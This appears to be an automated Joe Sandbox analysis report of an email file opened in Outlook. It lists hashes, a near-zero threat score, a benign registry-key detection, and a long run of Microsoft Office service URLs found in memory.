Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9ba54f65-7bc2-d549-b688-53131649ef52.eml

Overview

General Information

Sample name:9ba54f65-7bc2-d549-b688-53131649ef52.eml
Analysis ID:1532881
MD5:60624e033806c4f3cbaf007f40a20567
SHA1:30b3376aadd75ae410e80dd634bb0b94c18f9475
SHA256:e923f8572bcc23f76e60ea7200c48ae370c9648cb79c5bf96fc715f6bd43341a
Infos:

Detection

Score:1
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification

Classification

Process Tree

  • System is w10x64
  • OUTLOOK.EXE (PID: 7832 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\9ba54f65-7bc2-d549-b688-53131649ef52.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 7372 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "D675929E-58F5-446D-A282-324992C7C8DE" "6968D5F9-FDC3-4959-BF37-5B5D02ACDBD9" "7832" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Office Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 7832, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.aadrm.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.aadrm.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.addins.omex.office.net/api/addins/search
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.cortana.ai
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.microsoftstream.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.office.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.officescripts.microsoftusercontent.com/api
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.onedrive.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://api.scheduler.
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://apis.mobile.m365.svc.cloud.microsoft
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://app.powerbi.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://augloop.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://augloop.office.com/v2
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://canary.designerapp.
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://cdn.designerapp.osi.office.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designer-mobile
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/fonts
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-assets
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-dynamic-strings
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-home-screen
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://cdn.entity.
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://cdn.hubblecontent.osi.office.net/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://cdn.int.designerapp.osi.office.net/fonts
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://clients.config.office.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://clients.config.office.net/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/DeltaAdvisory
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://cortana.ai
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://cortana.ai/api
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://cr.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://d.docs.live.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://designerapp.azurewebsites.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://designerappservice.officeapps.live.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://dev.cortana.ai
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://devnull.onenote.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://directory.services.
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://ecs.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://ecs.office.com/config/v1/Designer
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://edge.skype.com/registrar/prod
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://edge.skype.com/rps
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://enrichment.osi.office.net/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601652342626
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://fpastorage.cdn.office.net/%s
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xml
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://graph.windows.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://graph.windows.net/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://ic3.teams.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://invites.office.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://lifecycle.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://login.microsoftonline.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://login.microsoftonline.com/organizations
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://login.windows.local
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://make.powerautomate.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://management.azure.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://management.azure.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://messagebroker.mobile.m365.svc.cloud.microsoft
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://messaging.action.office.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://messaging.engagement.office.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://messaging.office.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://mss.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://ncus.contentsync.
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://officeapps.live.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://officepyservice.office.net/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://officepyservice.office.net/service.functionality
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://onedrive.live.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://otelrules.azureedge.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://otelrules.svc.static.microsoft
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://outlook.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://outlook.office.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://outlook.office365.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://outlook.office365.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://outlook.office365.com/connectors
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://powerlift.acompli.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
